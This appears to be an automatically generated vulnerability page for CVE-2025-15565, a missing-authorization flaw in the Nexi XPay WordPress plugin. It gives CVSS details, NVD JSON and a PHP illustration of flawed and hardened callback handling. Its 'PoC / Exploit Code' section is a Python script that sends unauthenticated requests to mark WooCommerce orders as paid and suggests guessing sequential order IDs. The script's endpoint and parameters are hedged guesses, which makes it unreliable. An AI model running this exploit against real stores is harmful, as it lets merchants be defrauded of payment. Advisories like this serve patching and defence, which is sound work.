Security Vulnerability Report
CVE-2025-15565 CVSS 5.3 MEDIUM


Published: 2026-04-14 22:16:28
Last Modified: 2026-04-22 20:23:16

Description

The Nexi XPay plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the redirect function in all versions up to, and including, 8.3.0. This makes it possible for unauthenticated attackers to mark pending WooCommerce orders as paid/completed.
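As an added illustration (not code from the Nexi XPay plugin or from this report), the callback pattern behind this class of bug beside a hardened form: the handler marks a WooCommerce order paid only after verifying a gateway MAC with the merchant secret, confirming the order is still awaiting payment, and matching the amount. The MAC layout, option name, action name and parameter names are assumptions, not the plugin's own.

```php
<?php
// Added illustration (not the Nexi XPay plugin's code). Function, option,
// action and parameter names below are assumed for the example.

// Flawed pattern (CWE-862): trust an order id from the query string and mark it paid.
function xpay_demo_vulnerable_return() {
    $order = wc_get_order( absint( $_GET['order_id'] ?? 0 ) );
    if ( $order ) {
        $order->payment_complete(); // any unauthenticated caller with an order id can reach this
    }
}

// Hardened pattern: accept the request only when it carries a MAC computed with the
// merchant secret over the signed fields (field list and layout assumed here).
function xpay_demo_secure_return() {
    $p = array_map( 'sanitize_text_field', wp_unslash( $_GET ) );
    foreach ( array( 'codTrans', 'esito', 'importo', 'divisa', 'mac' ) as $k ) {
        if ( empty( $p[ $k ] ) ) {
            wp_die( 'Missing parameter', '', array( 'response' => 400 ) );
        }
    }
    $secret   = get_option( 'xpay_demo_mac_key' ); // assumed option holding the merchant secret
    $expected = sha1( 'codTrans=' . $p['codTrans'] . 'esito=' . $p['esito']
                    . 'importo=' . $p['importo'] . 'divisa=' . $p['divisa'] . $secret );
    if ( ! hash_equals( $expected, $p['mac'] ) ) {
        error_log( 'xpay_demo: MAC mismatch for transaction ' . $p['codTrans'] ); // detection signal
        wp_die( 'Invalid signature', '', array( 'response' => 403 ) );
    }
    $order = wc_get_order( (int) $p['codTrans'] ); // assumes codTrans carries the order id
    if ( ! $order || ! $order->has_status( array( 'pending', 'on-hold' ) ) ) {
        wp_die( 'Order not awaiting payment', '', array( 'response' => 409 ) );
    }
    // The signed amount is in cents; it must match the stored order total.
    $expected_cents = (int) round( $order->get_total() * 100 );
    if ( 'OK' !== $p['esito'] || (int) $p['importo'] !== $expected_cents ) {
        $order->update_status( 'failed', 'Gateway callback did not match the order.' );
        return;
    }
    $order->payment_complete( $p['codTrans'] );
}
add_action( 'woocommerce_api_xpay_demo_return', 'xpay_demo_secure_return' );
```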

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Nexi XPay plugin <= 8.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2025-15565
# This script demonstrates unauthorized order status modification.
# Note: The exact endpoint URL may vary based on plugin configuration.
import requests


def exploit(target_url, order_id):
    # The vulnerable endpoint is typically the WooCommerce API callback for the gateway
    # Example: http://target.com/?wc-api=WC_Gateway_XPay_Process_Completion
    endpoint = f"{target_url}/?wc-api=WC_Gateway_XPay_Process_Completion"
    # Parameters to simulate a successful payment callback
    # Attackers can guess valid order_ids as they are often sequential.
    params = {
        "order_id": order_id,
        "status": "completed",  # or specific flag indicating success
        "id_order": order_id,  # some plugins use different param names
    }
    try:
        # Send unauthenticated GET/POST request
        response = requests.get(endpoint, params=params, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully to {endpoint}")
            print(f"[+] Attempted to mark Order ID {order_id} as paid.")
            print(f"[+] Response: {response.text[:100]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL and a valid Order ID
    target = "http://example.com"
    order = "12345"
    exploit(target, order)
```

References

https://plugins.trac.wordpress.org/browser/cartasi-x-pay/tags/8.2.0/src/classes/Nexi/WC_Gateway_XPay_Process_Completion.php#L268
https://www.wordfence.com/threat-intel/vulnerabilities/id/f420151b-c783-49b1-b0e9-e936a904278a?source=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-15565",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-14T22:16:27.727",
    "lastModified": "2026-04-22T20:23:16.350",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Nexi XPay plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the redirect function in all versions up to, and including, 8.3.0. This makes it possible for unauthenticated attackers to mark pending WooCommerce orders as paid/completed."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-862" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/cartasi-x-pay/tags/8.2.0/src/classes/Nexi/WC_Gateway_XPay_Process_Completion.php#L268",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f420151b-c783-49b1-b0e9-e936a904278a?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```